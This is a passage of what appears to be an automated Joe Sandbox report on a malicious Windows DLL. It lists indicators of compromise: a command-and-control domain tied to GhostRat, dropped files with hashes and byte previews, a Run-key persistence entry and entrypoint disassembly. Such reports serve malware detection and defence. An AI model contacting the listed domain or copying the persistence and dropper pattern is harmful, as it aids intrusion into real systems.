http://crt.wosign.com/WoSignCodeSigning.crt0	rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.dr	false	Avira URL Cloud: safe	unknown
http://www.gnu.org	FileSystem_Stdio.dll.10.dr	false		high
http://www.wosign.com/cps/0	rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.dr	false	Avira URL Cloud: safe	unknown
https://data.iana.org/time-zones/tz-link.htmlPostScript	rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	false		high
http://ad59t82g.com/	rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1867581832.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ad59t82g.com/f1	rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ad59t82g.com/79;LY	rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crl.wosign.com/WoSignCodeSigning.crl0G	rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.dr	false	Avira URL Cloud: safe	unknown
https://www.geonames.org/	rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	false		high
http://www.astrolog.org/astrolog.htmMain	rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	false	Avira URL Cloud: safe	unknown
http://ad59t82g.com/13LL6	rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://data.iana.org/time-zones/tz-link.html	rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.22.88	ad59t82g.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581150
Start date and time:	2024-12-27 06:21:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0Gs0WEGB1E.dll renamed because original name is a hash value
Original Sample Name:	DF0DA14A75D792B85065BFABAAA38CA8.dll
Detection:	MAL
Classification:	mal100.evad.winDLL@112/8@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 184.30.17.174, 13.107.246.63
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:22:11	API Interceptor	4x Sleep call for process: rundll32.exe modified
05:22:38	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\mRiZvH\RVQwATT.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.22.88	photo_2024-09-18_20-00-20.exe	Get hash	malicious	GhostRat	Browse	ad59t82g.com/1/t2.bmp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ad59t82g.com	photo_2024-09-18_20-00-20.exe	Get hash	malicious	GhostRat	Browse	104.21.22.88
ad59t82g.com	N6xnw0iEGs.exe	Get hash	malicious	GhostRat	Browse	172.67.203.195

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.192
	exlauncher-unpadded.exe	Get hash	malicious	LummaC	Browse	172.67.218.163
	http://kxyaiaqyijjz.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://pdf-ezy.com/pdf-ez.exe	Get hash	malicious	Unknown	Browse	172.67.152.3
	b8ygJBG5cb.msi	Get hash	malicious	Unknown	Browse	172.67.194.29
	tBnELFfQoe.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.49.159
	phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.eml	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\mRiZvH\MSVCP140.dll	photo_2024-09-18_20-00-20.exe	Get hash	malicious	GhostRat	Browse
	3XRUFJRb3K.dll	Get hash	malicious	Unknown	Browse
	3Kel6xErOk.exe	Get hash	malicious	Nitol	Browse
	8CoDx513sS.exe	Get hash	malicious	Nitol	Browse
	3XRUFJRb3K.dll	Get hash	malicious	Unknown	Browse
	N6xnw0iEGs.exe	Get hash	malicious	GhostRat	Browse
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse
	pXm5oVO3Go.exe	Get hash	malicious	Nitol	Browse
	Rudvfa0Z17.exe	Get hash	malicious	Nitol	Browse
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\mRiZvH\FileSystem_Stdio.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	524288000
Entropy (8bit):	0.03656493643185356
Encrypted:	false
SSDEEP:
MD5:	8E66A0FF82DCE4BDDCB690E7A37B09BA
SHA1:	302169ADD87CFDBC4113AA895CF5B7506A25B81D
SHA-256:	10339B13076972F3ACE4F6DE38C532E60D94819D713CB058EF98121F6B87B33C
SHA-512:	A817C24131F1C18D06639C5F01E6FDC67CF7AB156EFF335F0397C46420001B581775D5B9CD5066DE4EE4979584B7F270413FB093119AC40F46A7922A9A10852E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<.A.]...]...]...+5..]...+..!]...+...]...%(..]...%8..]...]..f]...+...]...+0..]...+1..]...+6..]..Rich.]..........................PE..L...cZ.g...........!.........2......._.......................................0............@.........................@J.......6.......0..X....................@.......................................(..@............................................text.............................. ..`.rdata..$...........................@..@.data.......p.......X..............@....rsrc...X....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\mRiZvH\MSVCP140.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	436600
Entropy (8bit):	6.647460578716755
Encrypted:	false
SSDEEP:	12288:mgU0BGzePo6+J+4P0xYv7IQgihUgiW6QR7t5s03Ooc8dHkC2esMoWKl:I01Po6+J+dxYv7IQgR03Ooc8dHkC2e50
MD5:	C092885EA11BD80D35CB55C7D488F1E2
SHA1:	BFE2F5141AF49724A54C838B9A9CB6E54C4A6AA5
SHA-256:	885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
SHA-512:	8A600CCF97A6D5201BB791A43F16CD4CCD19A8E9DECAE79B8BA3E5200B6E8936649626112B1C6BDB1465AB8AFB395803A68286C76B817245C6077D0536D03344
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: photo_2024-09-18_20-00-20.exe, Detection: malicious, Browse Filename: 3XRUFJRb3K.dll, Detection: malicious, Browse Filename: 3Kel6xErOk.exe, Detection: malicious, Browse Filename: 8CoDx513sS.exe, Detection: malicious, Browse Filename: 3XRUFJRb3K.dll, Detection: malicious, Browse Filename: N6xnw0iEGs.exe, Detection: malicious, Browse Filename: nOyswc9ly2.dll, Detection: malicious, Browse Filename: pXm5oVO3Go.exe, Detection: malicious, Browse Filename: Rudvfa0Z17.exe, Detection: malicious, Browse Filename: nOyswc9ly2.dll, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...J(.`.........."!.........~...............0.......................................r....@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\mRiZvH\RVQwATT.exe

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	88168
Entropy (8bit):	5.395489376150381
Encrypted:	false
SSDEEP:	1536:Z2lmwrbw9TSUOTS+u+mgTMKZTE6yStygIOqOwSS/Sfso4ivBIaS33Eu:Z2lmwbgSUcHu6XvIkwh/SUo4ivBIbEu
MD5:	E5791842B09CB60905E07D3F1E3DA0EE
SHA1:	3EAE10382FE84D8E0F7F10398FFCEAE8ABC0606E
SHA-256:	92D79DE5E222282324317855B840ED9A320D44486C2C3573C371005203181F72
SHA-512:	585F64B079963DBA7BC0412CC925814849192190B478F785C1481B618A79836F9E740CA2142296310F7CB61C83EB40D26900F2A1F92ECF6A8822EB8DAD611C4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........G.m.G.m.G.m.<.a.E.m.(.f.C.m...c.R.m.(.g.<.m.G.l.!.m.%.~.N.m...\.A.m..k.F.m..i.F.m.RichG.m.........PE..L..../qC.............................8............@..........................`.......9..................................O...T...d....@...............@..h...............................................................x............................text.............................. ..`.rdata........... ..................@..@.data....U.......@..................@....rsrc........@... ... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\mRiZvH\VCRUNTIME140.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	79792
Entropy (8bit):	6.778797048504205
Encrypted:	false
SSDEEP:	1536:hExZIDobDaHrrAPsCbU4qzBHXpHolecbGpJGBNzZz3:yZPDaHrrobUHzDQecbGbGN
MD5:	9D5A742F221C4929A178BAF2B93FC7FB
SHA1:	928C9E0E1C18EC474C2F450CA00A154E44AC547A
SHA-256:	F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
SHA-512:	F4614962C67BB41B8A2FB17E3112745F4BA012BBF382C1CC7DEACD6C8525A53D75890A2EB46F0DA61BFA054DC52505B09A29291D5FA1C25C6201A66B9DC4B547
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L...19............"!.........................................................P............@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\mRiZvH\t3d.tmp

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	231953
Entropy (8bit):	7.999353861689407
Encrypted:	true
SSDEEP:	6144:vObTef3lX9XiFPCEUlBbcZ8qPTwGTsFVO9:vwOhiFGZk8+wGTsy9
MD5:	45C9D684F18C3BE0AE2DC829B2088BAF
SHA1:	F3FC5E8F6CB725DB3E9B75C029F4682CF592891C
SHA-256:	03DD0B12508985137D3BC73BD83FAEA0CCE0C7D960282EFF21484E7F4D690908
SHA-512:	E3782E9A8C1062779A04F3F0228B844998E930039DD3367D1CBAB0FC3FF673C073A1390E850207561B2632F554D260AA53AC4BF5FBFE13CAF962F9F7EF98D3DC
Malicious:	false
Preview:	PK..........XY................text/UT.....g..g..gPK..........7X........x.......text/MSVCP140.dllUT.....e, .g+V.f5O.....1.u....)..F.....6v..iN!...CM}./...Q..p?.........v....Z.f.h...E..K"U..kN7.t .{.Z..\2....(r._. Bb..T.......=..........}...x.<.4...=w.Vq..CN.......2....kv....X.r7`........3.....b...k..r..s..{{..O...;<.]..!U{.o.....uJB.......7....^)A..;.".1>.5..w....{ >6Z.>......zcqZ.E........Xp...)d....%fn.#.\6Q%..Z...M..0.>....>y..,.d.m.j(..i...A?'.O..i:....9.)...uR%..]..~.?...g..I.....F...N...j.5..x..jHJD{.6"_.9..y.}..8m....N{H..=.i.h...q.~>..Q..)..u".WVh.....>...F.....s....L.C..@ATi..D...Q....../.'}[...e.w........{.._.M.h....Kl........9K.r.lX..&...X.S.T..+.O...A.;+.@,-.W.l..p......0..km.8.......I2.Wc;@...DV..w....}...3.r,.>.e.&.y..........W....Y..O= 3.}.b.d.@L``.y.....).../.Nw..."H..G<$....7D1.b..7j.;..Ce...H.$q....9%.....G.....a,.gV.../..J.....&....]..Z...[.[r2.2k..5$.U["......{..%......]...iz1.34)Ym O..[.R.....h..O........s.-\.^...

C:\Program Files (x86)\mRiZvH\t4d.tmp

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PC bitmap, Windows 3.x format, 556 x 556 x 32, image size 1236544, cbSize 1236598, bits offset 54
Category:	dropped
Size (bytes):	1236598
Entropy (8bit):	7.385530283539845
Encrypted:	false
SSDEEP:	24576:0bau2DiyFqp34ymXikLSxpAkGZKMoLa7K2DOwIyblYsuGBK+WKOz6Z:0u5Fqp34ymLWxHGZKMoO79DjPbl/ugBW
MD5:	994058CE7402806C9BE68E1EE46B6946
SHA1:	87B50080C47B9949A5A6E9178784513906F81C98
SHA-256:	FC9A6867E3664ACF9E2E39DCD3ED2EF3C259C46FE37CE19ADC67CFD3BE4A4FDA
SHA-512:	0814D20E25DADE13ED767990FA85A7BA7914413D7F7A1B917FF4AF17F0A20417807E4A73C3576D557927B8E9E124C98C18D8C59111E235EE96557D93D9363710
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	BMv.......6...(...,...,..... .....@...................*R..d...c...........g...'...g...g...g...g...g...g...g...g...g...i...g...F..L.)Th.{ p.ggr.e c.fno.(beGzunGan #GS .gdeI...C...g....4.A.U...U...U...#5..U...#..FU...#...U...-(..U...-8..U...U...U...#...U...#0..U...#1..U...#6..U..5ach.U..g...g...g...g...g...g...7M..+....R.gg...g......!l...g...g:..g....W..g...g...g...g...g...b...g...b...g...g8..g...g...e.@.g...g...g...g...g...w...'B.......>......g8..?...g...g...g...g...gH......g...g...g...g...g...g...g...g.... ..'...g...g...g.......g...g...g...g...g...g...I\|ex........g...g...g...g...g...g...G..`Izda.i..C...g...g...g...g...g...g...'..@Ilat........gx..g...gP..g...g...g...'...Izsr....?...g8..g...g...g...g...g...'..@Izel.k......gH..g...g...g...g...g...'..Bg...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g.

C:\Program Files (x86)\mRiZvH\t5d.tmp

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
Category:	dropped
Size (bytes):	2487
Entropy (8bit):	6.795366664823187
Encrypted:	false
SSDEEP:	48:8BO8xOk10hBJoLiJRw7lsjXml1yB8aUGLMvv9H3zRb2AcHbRz+6uzUb9JY:8Bek10hBGLiJRw7lsjXmlIuaUGLMv1H/
MD5:	E226D09E44DBDC501B0C871E2F2CB4FA
SHA1:	DBCC363670F9B184075D13C83645408163994F4D
SHA-256:	47AA275183E86879406EAB69CDC12CE038447C37AA37D6E391CDDD8BB6CD79EC
SHA-512:	B40B42273D7B992EB4A79B2E6653653B662132761DCD88F632F09D24448A94187BA097D592E0356CA49C1A2B0D83ECC01E7BC26F339DEB7407644C3F64198BDE
Malicious:	false
Preview:	BM.......6...(...z...y..... .........................2.....s.....0.g.S3..\$;.\$..\$..\$..@..H.V0.B..@$.7 ..T.;.....U.....ara......i.)..g...d.Iu...............g...g3.u.;.S.R<.$..g.Ph.O.i.L$0....g.t$W.D$_`.e.N.a....,8.#,Dh.......g.t$'.D$7`..!..za...#,X.. .DC.P.#,.n.llf.L$....TC .tC(....+.n.K.g..tC .DCHh.6^f.^.......#,8.N...T..<fku1.t...}....d.+.\|f.eu{.\|.cku..t...}.....d...\|f.etqI..oZ.....g..........j'...g8..1..$.....x S.\$8.D$\|.$.g....(P.3,<.#,\|..(.._X..C...g.T$#.D$.b@V.x,S.\$8.D$\|.$.g....$P.3,<.#,\|..$.HG.D._X..C...g.T$#.D$..H,d@ .#,.W.:_.#@8..,..g..DC.P.#,.3U&df.L$ .d.\C*.TC .tC(...6......g..tC .DC@hi..y.b....\|$0.L$T..\.1...g..tC0.DChhI.>.....\|$@.L$l.$..e...g..tC@.DCphj.._......\|$P.$.g..h.(.&....g.t$?..$.......1x...g...'.t$G.D$;`.=.9.~c....,(.#,hhT.0p.d..g....L$`.$.g..P....g.T$#..tnW^3.S..:.DCt8XOb..;,$t`.,.g.......g..$.....p4.>b..;,$t`...g.......gQ3..U.....1_j...3....}..}..[ .$L.....@f..j'`.0g.h.g..W.[..$P;.h.%.g..}o.u..Kd.d.Ch.E.Q0_P.4,..h...g..}o..E..p..K\..@...u..H

C:\Program Files (x86)\mRiZvH\t6d.tmp

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
Category:	dropped
Size (bytes):	2487
Entropy (8bit):	6.791549044495638
Encrypted:	false
SSDEEP:	48:8BO8xOk10hBJoLiJRw7lsjXml1yB8aUGLMvv9H3zRb2AcHbRzG6DazUo93OY:8Bek10hBGLiJRw7lsjXmlIuaUGLMv1Hz
MD5:	5A4C77C94D7F36D5A95C65C1196E0D2E
SHA1:	4339BF1CFB517246746E2DF78E52F6857B743038
SHA-256:	C1933665CC4D1E5E04614D5E8D915DE4C92B3C6F3946BE88951727F0F206829E
SHA-512:	577C2DCDE13A34EE1E727869B182DDDF540CDCBCE797E0DB0BEAA8A6CA39CDB48EB81D3F58A915670DAD2AEE72E8A90422DE573CBFE97B724246A8911CBE9F69
Malicious:	false
Preview:	BM.......6...(...z...y..... .........................2.....s.....0.g.S3..\$;.\$..\$..\$..@..H.V0.B..@$.7 ..T.;.....U.....ara......i.)..g...d.Iu...............g...g3.u.;.S.R<.$..g.Ph.O.i.L$0....g.t$W.D$_`.e.N.a....,8.#,Dh.......g.t$'.D$7`..!..za...#,X.. .DC.P.#,.n.llf.L$....TC .tC(....+.n.K.g..tC .DCHh.6^f.^.......#,8.N...T..<fku1.t...}....d.+.\|f.eu{.\|.cku..t...}.....d...\|f.etqI..oZ.....g..........j'...g8..1..$.....x S.\$8.D$\|.$.g....(P.3,<.#,\|..(.._X..C...g.T$#.D$.b@V.x,S.\$8.D$\|.$.g....$P.3,<.#,\|..$.HG.D._X..C...g.T$#.D$..H,d@ .#,.W.:_.#@8..,..g..DC.P.#,.3U&df.L$ .d.\C*.TC .tC(...6......g..tC .DC@hi..y.b....\|$0.L$T..\.1...g..tC0.DChhI.>.....\|$@.L$l.$..e...g..tC@.DCphj.._......\|$P.$.g..h.(.&....g.t$?..$.......1x...g...'.t$G.D$;`.=.9.~c....,(.#,hhT.0p.d..g....L$`.$.g..P....g.T$#..tnW^3.S..:.DCt8XOb..;,$t`.,.g.......g..$.....p4.>b..;,$t`...g.......gQ3..U.....1_j...3....}..}..[ .$L.....@f..j'`.0g.h.g..W.[..$P;.h.%.g..}o.u..Kd.d.Ch.E.Q0_P.4,..h...g..}o..E..p..K\..@...u..H

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.444480250430704
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0Gs0WEGB1E.dll
File size:	136'192 bytes
MD5:	df0da14a75d792b85065bfabaaa38ca8
SHA1:	242c2c510fab747f0d1ba8913adc500bab86e73e
SHA256:	654f700f4315594fcd4297cbe4a793aa6487ae5060707164f47d6fc9735662cb
SHA512:	f87bf533ed8d43f58dcc4f7931eee3bbbea5c682862bec9b76568e7b11eaa9a971a7a72214d8c494bbf50a19f19cbb2df7df7d3f72437e67a2856f9dfc4cedfa
SSDEEP:	3072:B3fO20ODW+x/9A4w0c5IVYBVg9ljZy/5/:BvOAm7fIeBVyljZyx/
TLSH:	DDD39C2A3250C035C177953E6869A7B20EBFB822467E0147B7580A6DAF712C4DF3E70B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V<...].V.].V.].V}+bV.].V}+VVx].V..oV.].V}+WV<].V.%.V.].V.%oV.].V.].V.].V}+SV.].V}+gV.].V}+aV.].VRich.].V................PE..L..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x1000c1a4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x671E6559 [Sun Oct 27 16:07:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	02265d4855d6a2a048af001cf15e813d

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FB2B0CA7667h
call 00007FB2B0CAB9FDh
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007FB2B0CA7551h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 100185F0h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007FB2B0CA766Eh
test byte ptr [eax], 00000008h
je 00007FB2B0CA7669h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [10018164h]
leave
retn 0008h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
sub esp, 18h
push ebx
mov ebx, dword ptr [ebp+0Ch]
push esi
mov esi, dword ptr [ebx+08h]
xor esi, dword ptr [100200B0h]
push edi
mov eax, dword ptr [esi]
mov byte ptr [ebp-01h], 00000000h
mov dword ptr [ebp-0Ch], 00000001h
lea edi, dword ptr [ebx+10h]
cmp eax, FFFFFFFEh
je 00007FB2B0CA766Fh
mov ecx, dword ptr [esi+04h]
add ecx, edi
xor ecx, dword ptr [eax+edi]
call 00007FB2B0CA5DDDh
mov ecx, dword ptr [esi+0Ch]
mov eax, dword ptr [esi+08h]
add ecx, edi
xor ecx, dword ptr [eax+edi]
call 00007FB2B0CA5DCDh
mov eax, dword ptr [ebp+08h]

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 build 21022
[C++] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[EXP] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1e680	0x141b	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1da60	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24000	0x1314	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1ce50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x18000	0x22c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16080	0x16200	896966993b9dca6906f339b7649e6291	False	0.5698380120056498	data	6.638915335628102	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x7a9b	0x7c00	4bc60c843676bfe0868e727ff8dd4d03	False	0.39018397177419356	data	5.340636076181367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x20000	0x3040	0x1200	7c79f953e9c8dd2021568e7063733c45	False	0.3391927083333333	data	3.7361216093039817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x24000	0x1fc6	0x2000	3511d3bef91282d35343e5fdc365513b	False	0.5023193359375	data	4.825808214691758	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
